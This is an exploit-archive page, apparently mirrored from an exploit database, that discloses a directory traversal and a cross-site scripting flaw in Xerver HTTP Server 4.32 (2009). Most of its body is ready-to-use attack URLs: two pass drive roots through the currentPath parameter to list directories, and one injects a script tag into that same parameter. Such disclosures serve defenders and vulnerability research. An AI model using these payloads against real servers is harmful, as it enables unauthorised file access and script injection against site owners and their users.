[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Xerver HTTP Server v4.32 XSS / Directory Traversal Vulnerability
# Published : 2009-09-18
# Author : Stack
# Previous Title : nginx 0.7.61 WebDAV directory traversal
# Next Title : Quiksoft EasyMail 6.0.3.0 imap connect() ActiveX BOF Exploit


Xerver HTTP Server v4.32 XSS / Directory Traversal Vulnerability


By Stack


Directory Traversal Exploit :

http://127.0.0.1:32123/action=chooseDirectory&currentPath=d:%5C

http://127.0.0.1:32123/action=chooseDirectory&currentPath=c:




XSS Exploit :


http://127.0.0.1:32123/action=chooseDirectory&currentPath='">><script>alert('XSS By Stack')</script>

# www.Syue.com [2009-09-18]